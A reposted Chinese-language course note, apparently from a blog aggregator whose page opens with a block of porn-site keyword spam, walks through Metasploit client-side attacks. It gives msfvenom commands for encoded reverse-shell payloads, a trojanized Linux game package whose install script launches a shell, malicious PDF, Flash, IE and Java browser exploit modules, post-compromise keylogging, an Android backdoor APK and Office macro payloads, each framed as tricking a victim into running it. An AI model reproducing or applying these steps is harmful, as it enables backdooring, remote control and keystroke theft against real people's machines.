日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

MSF(五):客户端渗透

發(fā)布時間:2023/12/31 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 MSF(五):客户端渗透 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

客戶端滲透

安全牛學習Metasploit Framework筆記

在無法突破網(wǎng)絡(luò)邊界的情況下轉(zhuǎn)而攻擊客戶端

1、含有漏洞利用代碼的WEB站點

  • 利用客戶端漏洞

2、社會工程學

  • 直接騙取到敏感信息
  • 含有漏洞利用代碼的DOC、PDF等文檔或Payload,誘騙被害者執(zhí)行

3、誘騙被害者執(zhí)行Payload (windows)
注:msfvenom集合了編碼、payload

  • msfvenom --list-options -p windows/shell/reverse_tcp
    查看payload的基本信息
  • msfvenom --platform windows -p windows/shel/reverse_tcp LHOST=x.x.x.x LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i -6 -f exe -o 1.exe
參數(shù): -a:指定目標系統(tǒng)的硬件架構(gòu) --platform:指定目標運行平臺 -p:指定payload LHOST:反彈連接的目標IP地址 LPORT:反彈連接的目標端口 -b:去掉壞字符 -e:使用編碼模塊 -i:編碼次數(shù) -f:指定輸出文件格式 -o:輸出文件名
  • msfconsole (啟動偵聽,注意payload的port要和前面的msfvenom設(shè)置的一樣)
    use exploit/multi/handler
    set payload windows/shell/reverse_tcp
    set LHOST x.x.x.x
    set LPORT 9898
    exploit
    只要目標客戶端執(zhí)行我們制作的exe文件,我們即可獲得目標shell

4、誘騙被害者執(zhí)行Payload (Linux Deb安裝包)

  • apt-get --download-only install freesweep
    因為只需要dep文件,所以加上參數(shù)–download-only,下載好的文件保存在/var/cache/qpt/archives
  • dpkg -x freesweep_0.90-1 i386.deb free
    解壓縮目標文件,到指定目錄free下
  • mkdir free/DEBIAN && cd free/DEBIAN
  • vi control
    內(nèi)容:
Package: freesweep Version: 1.0.1-1 Section: Games and Amusement Priority: optional Architecture: i386 Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com) Description: a text-based minesweeperFreesweep is an implementation of the popular minesweeper game, whereone tries to find all the mines without igniting any, based on hints givenby the computer. Unlike most implementations of this game, Freesweepworks in any visual text display - in Linux console, in an xterm, and inmost text-based terminals currently in use.
  • vi postinst
    內(nèi)容:
#!/bin/sh sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/ freesweep_scores & /usr/games/freesweep &
  • msfvenom --platform linux -p linux/x86/shell/reverse_ tcp LHOST=x.x.x.x LPORT=9999 -b "\x00" -f elf -o /root/free/usr/games/freesweep_ scores
  • chmod 755 postinst
  • dpkg-deb --build /root/free
  • 將/root/下的free.deb,傳給目標
  • msfconsole啟動偵聽
    use exploit/multi/handler
    set payload linux/x86/shell/reverse_tcp
    set lport 9999
    exploit(開啟偵聽)
  • 只要目標dpkg -i free.deb,安裝該文件,我們偵聽的端口就會獲得反彈的shell

5、利用Acrobat Reader漏洞執(zhí)行payload

(1)構(gòu)造PDF文件,誘使目標點擊

  • exploit/windows/fileformat/adobe_utilprintf
  • set payload windows/meterpreter/reverse_tcp
  • exploit
  • use exploit/multi/handleer(開啟偵聽)
  • set payload windwos/meterpreter/reverse_tcp
  • exploit
  • 只要目標執(zhí)行PDF文件,我們即可獲得shell

(2)構(gòu)造惡意網(wǎng)站:,誘使目標訪問

  • exploit/windows/browser/adobe_utilprintf
  • set payload windows/meterpreter/reverse_tcp
  • exploit
    (原理:只要目標訪問我們設(shè)定的網(wǎng)址,便會執(zhí)行漏洞代碼;隨后反彈shell給我們的攻擊機)
  • use priv
    本地提權(quán)
  • run post/windows/capture/keylog_recorder
    對目標客戶端啟動鍵盤記錄
  • msf外tail查看目標鍵盤最新輸入的數(shù)據(jù),tail -f實時查看目標鍵盤最新輸入的數(shù)據(jù)

6、利用Flash插件漏洞執(zhí)行payload
(1)攻擊模塊一

  • use exploit/multi/browser/adobe_flash_hacking_team_uaf
  • 設(shè)置反彈shell

(2)攻擊模塊二

  • use exploit/multi/browser/adobe_flash_opaque_background_uaf
  • 設(shè)置反彈shell

(3)輔助模塊(該模塊打包所有和瀏覽器相關(guān)的漏洞利用模塊)

  • use auxiliary/server/browser_autopwn2
  • run
    在自動選取高質(zhì)量瀏覽器利用模塊
    原理:只要目標瀏覽器訪問了我們設(shè)置的地址,便會將自動選取的利用模塊依次利用,可以成功利用的模塊即返回信息

7、利用IE瀏覽器漏洞執(zhí)行payload

  • use exploit/windows/browser/ms14_064_ole_code_execution
  • set payload windows/meterpreter/reverse_tcp
  • exploit

8、利用JRE漏洞執(zhí)行payload
(1)攻擊模塊一

  • use exploit/multi/browser/java_ jre17_driver_manager
  • set payload java/meterpreter/reverse_tcp

(2)攻擊模塊二

  • use exploit/multi/browser/java_jre17_jmxbean
  • set payload java/meterpreter/reverse_tcp

(3)攻擊模塊三

  • use exploit/multi/browser/java_jre17_reflection_types
  • set payload java/meterpreter/reverse_tcp

9、生成Android后門]程序
(1)攻擊模塊一(這種方法我沒有生成apk,因為-f參數(shù)沒有apk選項,所以干脆省略,但使用安卓手機解析時會顯示出問題)

  • use payload/android/meterpreter/reverse_tcp
  • generate -f a.apk -p android -o peak.apk
    -p:目標平臺、-o:生成文件
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
    (2)攻擊方法二(因為-f不存在apk,所以可以將-f參數(shù)省略,直接-o或>,這一種解析不會出問題)
  • msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=192.168.100.162 lport=8899 -o peak.apk
  • use /exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • exploit

10、VBScript感染方式
(1)利用宏感染word、excel文檔,繞過某些基于文件類型檢查的安全機制

(2)生成vbscript腳本msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 - e x86/shikata_ga_nai -f vba-exe

(3)Office 2007 +(office版本2007以上)

  • 新建word文檔,選擇視圖一一宏一一創(chuàng)建
  • 在創(chuàng)建的宏里粘入Payload第一部分的VBA代碼
由 Sub Auto_Open()Goepu12 End Sub 到 Sub Workbook_Open()Auto_Open End Sub
  • word文檔正文沾入Payload第二部分的內(nèi)容

    Jjiktezjhl
    到最后
    (4)Msf啟動偵聽
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • exploit

(5)只要目標打開office,攻擊機即可獲得shell

總結(jié)

以上是生活随笔為你收集整理的MSF(五):客户端渗透的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。